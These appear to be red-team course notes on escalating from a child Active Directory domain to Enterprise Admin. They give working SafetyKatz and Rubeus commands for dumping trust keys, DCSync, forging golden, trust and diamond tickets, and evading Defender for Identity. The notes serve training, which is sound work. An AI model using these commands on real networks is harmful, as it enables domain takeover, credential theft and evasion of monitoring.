Certified Red Team Professional (CRTP) - Notes

7.6 - Across Trusts

Privilege Escalation Across Trusts

Trusts Between Domains and Forests

In Active Directory environments, trust relationships determine how authentication requests are handled across domain or forest boundaries.

  • Inter-Domain Trusts (Same Forest): Domains in the same forest are linked by two-way, transitive trusts that are created automatically (parent-child and tree-root trusts). Users in one domain can authenticate to any other domain in the forest and access resources there, subject to the permissions granted on those resources. Because the forest, not the domain, is the security boundary, SID filtering is not applied to these trusts by default; this is what makes the sIDHistory abuse described below possible.

  • Inter-Forest Trusts: Trusts between separate forests must be created explicitly and can be one-way or two-way. They are required for cross-forest authentication and resource access, and SID filtering is enabled on them by default, so SIDs that do not belong to the trusted forest (for example the trusting forest's own Enterprise Admins SID) are stripped from tickets crossing the trust. The techniques on this page therefore target child-to-parent escalation inside one forest.


Escalating Privileges to Enterprise Admins

Using sIDHistory for Privilege Escalation

The sIDHistory attribute holds the previous SIDs of a security principal. It exists so that accounts migrated from another domain keep their old access, and the SIDs it contains are copied into the ExtraSids field of the PAC in the user's tickets alongside the normal group SIDs. Within a forest those extra SIDs are not filtered, so an attacker who can forge tickets in a child domain can add the SID of a privileged group from the parent domain (e.g., Enterprise Admins, RID 519 of the forest root) and the parent's domain controllers will honor it.

There are two main ways to do this, covered in order below:

  1. Forging trust tickets (inter-realm TGTs) with the trust key shared between the child and parent domains

  2. Forging a Golden Ticket with the krbtgt hash of the child domain and adding the parent SID to the ticket's sIDHistory


Method 1: Forging Trust Tickets

To forge an inter-realm TGT (trust ticket), the attacker needs the inter-domain trust key: the password of the trust account that the child domain keeps for the parent (in the lab, dcorp\mcorp$), whose hash is shared by both domains and used to encrypt referral tickets crossing the trust. Obtaining it requires Domain Admin (or equivalent) rights in the child domain.

Retrieving the Trust Key

On the child domain controller itself, dump the trust keys directly:

SafetyKatz.exe "lsadump::trust /patch" "exit"

Alternatively, DCSync the trust account from any domain-joined host with DA rights in the child domain, or dump LSA secrets on the DC (lsadump::lsa must run on the DC itself):

SafetyKatz.exe "lsadump::dcsync /user:dcorp\mcorp$" "exit"
SafetyKatz.exe "lsadump::lsa /patch" "exit"

Note the RC4 (NTLM) value of the trust key. Trust account passwords rotate automatically (every 30 days by default), so use a freshly dumped value.

Forging the Ticket with Rubeus

Rubeus.exe silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:<trust_key_ntlm_hash> /sid:<child_domain_sid> /sids:<enterprise_admins_sid_from_parent> /user:Administrator /ldap /nowrap

Then use the forged inter-realm TGT to request a service ticket from the parent domain controller. The example below asks for an HTTP ticket for mcorp-dc, which is what PowerShell Remoting (WinRM) needs, and injects it into the current logon session:

Rubeus.exe asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket:<FORGED_TGT>

Rubeus Silver Ticket Options (Summary)

  • /service: SPN to put in the ticket; krbtgt/<realm> makes it a TGT rather than an ordinary service ticket

  • /rc4: NTLM hash of the trust key, used to encrypt the ticket

  • /sid: SID of the child domain (the realm the ticket claims to come from)

  • /sids: extra SIDs placed in the PAC's ExtraSids field, here the Enterprise Admins SID of the parent domain

  • /user: username to impersonate

  • /ldap: query the domain over LDAP to fill the PAC (user RID, groups, logon data) with real values

  • /nowrap: print the base64 ticket on a single line so it can be pasted into asktgs without line breaks


Method 2: Forging Golden Tickets with krbtgt Hash

This method is simpler and needs no trust ticket at all. With the krbtgt hash of the child domain, forge an ordinary Golden Ticket for the child and add the SID of the parent domain's Enterprise Admins group via /sids, which places it in the ticket's sIDHistory (ExtraSids).

Example (using SafetyKatz)

SafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:<child_domain_sid> /sids:<enterprise_admins_sid> /krbtgt:<krbtgt_hash> /ptt" "exit"

This works because the ticket is encrypted with the child domain's real krbtgt key, so the child DC accepts it and issues a referral TGT for the parent that carries the same ExtraSids. The parent DC trusts referrals from the child and, with no SID filtering inside the forest, treats the holder as an Enterprise Admin.


Bypassing Detection (MDI, Logging)

A Golden Ticket for "Administrator" followed by a DCSync from a workstation is exactly what Microsoft Defender for Identity (MDI) alerts on (replication requested by a host that is not a domain controller). To make the activity look like ordinary replication, forge the ticket as the child domain controller's machine account instead and add the Enterprise Domain Controllers SID (S-1-5-9) to the extra SIDs. Use the account's real RID for /id (1000 for dcorp-dc$ in the lab; confirm it with Get-ADComputer or PowerView before forging, since the name and RID in the PAC must belong to the same account):

SafetyKatz.exe "kerberos::golden /user:dcorp-dc$ /id:1000 /domain:dollarcorp.moneycorp.local /sid:<child_domain_sid> /sids:<enterprise_admins_sid>,S-1-5-9 /krbtgt:<krbtgt_hash> /ptt" "exit"

With that ticket injected, DCSync the parent domain's krbtgt hash; from the parent DC's point of view the replication request now comes from a domain controller:

SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

Relevant SIDs:

  • S-1-5-21-...-516: Domain Controllers group (domain-specific, RID 516 appended to the domain SID)

  • S-1-5-9: Enterprise Domain Controllers (well-known, not domain-relative; every DC in the forest carries it)


Using Rubeus for Golden Ticket Forgery

The same ticket with Rubeus, using the krbtgt AES256 key instead of the RC4 hash so the ticket carries the encryption type a modern domain normally issues (an RC4 ticket in an AES domain triggers MDI's encryption-downgrade detection):

Rubeus.exe golden /aes256:<krbtgt_aes256_key> /user:dcorp-dc$ /id:1000 /domain:dollarcorp.moneycorp.local /sid:<child_domain_sid> /sids:<enterprise_admins_sid>,S-1-5-9 /dc:DCORP-DC.dollarcorp.moneycorp.local /ptt

Using Rubeus Diamond Ticket to Bypass MDI

A diamond ticket starts from a real TGT issued by the KDC (here obtained with /tgtdeleg, which abuses Kerberos GSS-API delegation to get a usable TGT for the current user without knowing its password), decrypts it with the krbtgt key, rewrites the PAC (user, RID, extra SIDs) and re-encrypts it. Because the ticket's timestamps, flags and encryption type were set by the KDC rather than guessed by the attacker, it lacks the tell-tale anomalies of a fully forged Golden Ticket:

Rubeus.exe diamond /krbkey:<krbtgt_aes256_key> /tgtdeleg /enctype:aes /ticketuser:dcorp-dc$ /ticketuserid:1000 /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /sids:<enterprise_admins_sid>,S-1-5-9 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

/createnetonly starts a new cmd.exe with a netonly logon session and injects the ticket into that session, leaving the tickets of the current session untouched.

With the diamond ticket injected, DCSync the parent krbtgt hash as before (if not already done):

SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"